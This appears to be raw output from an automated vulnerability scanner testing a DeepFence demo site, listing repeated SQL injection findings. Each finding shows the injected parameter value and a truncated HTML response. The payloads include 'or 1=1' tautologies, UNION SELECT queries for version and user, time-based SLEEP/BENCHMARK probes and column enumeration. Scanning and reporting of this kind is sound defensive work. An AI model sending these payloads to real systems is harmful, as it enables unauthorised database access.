Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #687\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AS INJECTX WHERE 1=1 AND 1=0\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #688\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #689\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified Name ValueParameters demouser@\ndeepfence.ioAND 1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #690\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #691\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #692\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR\n(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(\n116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #693\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioadmin\" or 1=1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.ioCWE-ID CWE-89\nIssue Number #694\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+\nCHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #695\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 6\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #696\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR\n(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(\n116)+CHAR(69)+CHAR(65)+CHAR(113)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #697Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 0\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #698\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #699\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter 